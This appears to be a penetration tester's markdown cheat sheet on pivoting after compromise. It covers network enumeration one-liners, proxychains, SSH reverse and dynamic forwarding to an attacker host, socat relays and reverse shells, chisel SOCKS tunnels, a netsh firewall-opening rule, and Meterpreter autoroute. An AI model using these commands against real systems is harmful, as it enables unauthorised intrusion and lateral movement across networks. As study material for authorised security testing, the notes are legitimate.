# Pivoting * Tunnelling/Proxying * Port Forwarding ## Enumeration ### Using material found on the machine and preinstalled tools * `arp -a` * `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts` * `/etc/resolv.conf` * `ipconfig /all` * `nmcli dev show` * [Statically compiled tools](https://github.com/andrew-d/static-binaries.git) ### Scripting Techniques ```sh for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done ``` * Using local tools through a proxy like `nmap` ## Tools * Enumerating a network using native and statically compiled tools ### Proxychains / FoxyProxy * In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains ```sh ssh @$ATTACKER_IP -R 9050 -N ``` * Proxychains, e.g. scan target via nmap, or connect via nc through jump server ```sh proxychains nc proychains nmap proxychains ssh user@$TARGET_IP proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS proxychains wget http://$TARGET_IP:8000/loot.zip ``` * Use `/etc/proxychains.conf` or `./proxychains.conf`containing: ```sh [ProxyList] # add proxy here ... # meanwhile # defaults set to "tor" socks4 127.0.0.1 9050 #socks5 127.0.0.1 1337 # proxy_dns ``` * FoxyProxy, choose proxy type, proxy IP and port in settings ### SSH port forwarding and tunnelling (primarily Unix) * LocalPortForwarding ```sh ssh -L $LOCAL_PORT:: @ -fN ``` * Another possibility to use the jumpserver directly on it's cli via `ssh @ -L *:$LOCAL_PORT:127.0.0.1:80 -N`. One can connect now to the target via the jumpserver * Tip: open port on windows target via ```sh netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT% ``` * Dynamic Port Forwarding ```sh ssh -D $PORT @ -fN ``` * Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via ```sh ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN ``` * Tip1: create a user on the attacker to receive the connection without compromising your own password * Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target ### plink.exe (Windows) * [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) ```sh cmd.exe /c echo y | .\plink.exe -R :: @ -i -N ``` * Key generation ```sh puttygen -o key.ppk ``` * Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d) ```sh echo y | &.\plink.exe -ssh -l -pw -R ::127.0.0.1: ``` ### Socat * Reverse shell on target via ```sh ./socat tcp-l:8000 tcp::443 & ``` * Attacking bind shell ```sh sudo nc -lvnp 443 ``` * Relay on jumpserver via ```sh ./socat tcp-l:33060,fork,reuseaddr tcp::3306 & ``` * Quiet Port Forwarding * On attacker ```sh socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & ``` * On relay server ```sh ./socat tcp::8001 tcp::,fork & ``` * Open `localhost:8000` * Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`. * In need of a Download on target, expose a port on the attacker via relay ```sh socat tcp-l:80,fork tcp:$ATTACKER_IP:80 ``` ### Chisel * **Does not require SSH on target** * Reverse Proxy * Bind port on attacker ```sh ./chisel server -p --reverse & ``` * Reverse port on target/proxy ```sh ./chisel client : R:socks & ``` * `proxychains.conf` contains ```sh [ProxyList] socks5 127.0.0.1 ``` * Forward SOCKS Proxy * Proxy/compromised machine ```sh ./chisel server -p --socks5 ``` * On attacker ```sh ./chisel client : :socks ``` * Remote Port Forward * On attacker ```sh ./chisel server -p --reverse & ``` * On forwarder ```sh ./chisel client : R::: & ``` * Local Port Forwarding * On proxy ```sh ./chisel server -p ``` * On attacker ```sh ./chisel client : :: ``` ### sshuttle * `pip install sshuttle` * `sshuttle -r @ ` * or automatically determined ```sh sshuttle -r @ -N ``` * Key based auth ```sh sshuttle -r @ --ssh-cmd "ssh -i " ``` * Exclude servers via `-x`, for example the target/gateway server ### Meterpreter * Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do ```sh portfwd add -l 22 -p 22 -r 127.0.0.1 ``` #### Meterpreter Auto Routing * Upload payload and catch it with `multi/handler` ``` background use post/multi/manage/autoroute set session 1 set subnet <10.0.0.0> run ``` #### Meterpreter Proxy Routing * Specify socks proxy via ```sh use auxiliary/server/socks_proxy ``` * Set proxychain on attacker accordingly ### rpivot * [klsecservices' repo](https://github.com/klsecservices/rpivot.git) * [Their windows binary release](https://github.com/klsecservices/rpivot/releases/tag/v1.0) ## Links * [Shadowmove at the adepts of 0xcc](https://adepts.of0x.cc/shadowmove-hijack-socket/)